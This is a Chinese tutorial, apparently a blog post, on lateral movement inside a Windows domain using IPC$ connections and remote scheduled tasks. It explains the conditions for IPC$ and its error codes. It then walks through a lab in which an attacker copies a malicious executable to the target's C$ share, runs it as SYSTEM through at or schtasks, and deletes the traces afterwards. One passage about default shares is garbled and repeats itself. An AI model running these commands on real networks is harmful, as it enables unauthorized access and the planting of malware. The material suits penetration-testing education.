系列文章第一章节之基础知识篇
内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透(二)之基础知识-工作组介绍
内网渗透(三)之基础知识-域环境的介绍和优点
内网渗透(四)之基础知识-搭建域环境
内网渗透(五)之基础知识-Active Directory活动目录介绍和使用
内网渗透(六)之基础知识-域中的权限划分和基本思想
内网渗透(七)之基础知识-企业常见安全域划分和结构
内网渗透(八)之基础知识-企业域中计算机分类和专业名
系列文章第二章节之内网信息收集篇
内网渗透(九)之内网信息收集-手动本地信息收集
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
内网渗透(十一)之内网信息收集-内网IP扫描和发现
内网渗透(十二)之内网信息收集-内网端口扫描和发现
内网渗透(十三)之内网信息收集-收集域环境中的基本信息
内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息
内网渗透(十五)之内网信息收集-域环境中定位域管理员
内网渗透(十六)之内网信息收集-powershell基础知识
内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位
系列文章第三章节之Windows协议认证和密码抓取篇
内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希)
内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议)
内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议)
内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式
内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式
内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash
内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取
内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施
系列文章第四章节之横向移动篇
内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动
内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!
IPC配合计划任务横向移动
IPC$横向
IPC$介绍
IPC( Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算 机的共享资源时使用。
通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
首先,需要建立一个ipc$
net use \\192.168.41.29\ipc$ "密码" /user:administrator
net use
IPC$利用条件
1、开启了139、445端口
ipcs可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应 用。通过139、445( Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipcs需要139、445端口的支持。
2、管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c 、 d 、d 、d、e 等和系统目录 w i n n t 或 w i n d o w s ( a d m i n S ) )通过 i p c 等和系统目录winnt或windows( adminS))通过ipc 等和系统目录winnt或windows(adminS))通过ipc,可以实现对这些默认共享目录的访问
IPC$连接失败原因
用户名或密码错误
目标没有打开ipcs默认共享
不能成功连接目标的139、445端口
IPC$连接常见错误
错误号5:拒绝访问
错误号51: Windows无法找到网络路径,即网络中存在问题。
错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的 lanmanserver服务未 启动目标有防火墙(端口过滤)
错误号67:找不到网络名,包括 lanmanworkstation服务未启动、ipcs已被删除
错误号1219:提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进行连接。
错误号1326:未知的用户名或错误的密码
错误号l792;试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连 接域控制器时会出现此情况)。
错误号2242:此用户的密码已经过期,例如:目标机器设置了账号管理策略,强制用户定期修改密码。
利用方式-windows自带命令
dir命令
在使用 netuse命令与远程目标机器建立ipcs后,可以使用dir命令列出远程主机中的文件, 如图
dir \\192.168.41.29\c$
tasklist命令
在使用 net use命令与远程目标机器建立ipcs后,可以使用 tasklist命令的/S、/U /P参数列 出远程主机上运行的进程
tasklist /s 192.168.41.29
查看系统时间
net time \\IP地址
利用方式-schtasks
实验环境
| 机器名 | IP |
|---|---|
| Windows server 2012(域控) | 192.168.41.10 |
| windows server 2003(域内机器) | 192.168.41.29 |
假设前期我们已经通过各种方式拿到了域控的权限,接下来我们要拿到 Windows 2003的权限,我们可以通过计划任务的方式横向获得,这里有一个前提条件,那就是我们已经知道了Windows 2003 的 IP、用户名和密码等信息
(1)建立IPC链接
shell net use \\192.168.41.29\ipc$ "12345678" /user:pc-2003\administrator
(2)复制恶意文件到目标机器
这里的artifact.exe是我们要拷贝的恶意程序
copy 文件 \\IP地址\C$
(3)at&schtask创建计划任务(Windows2003以前用at命令,以后用schtasks命令)
at命令创建计划任务:
at \\IP地址 时间 C:\文件
schtasks命令创建计划任务:
schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f
(4.1)at命令执行计划任务:
at命令不用执行,等待设定的时间,到了就会上线
(4.2)schtasks命令执行计划任务:
schtasks /run /s IP地址 /i /tn "计划任务名"
目标机器成功上线
(5)删除计划任务
schtasks /delete /s IP地址 /tn "计划任务名" /f
(6)清除IPC连接
net use \\IP /del /y
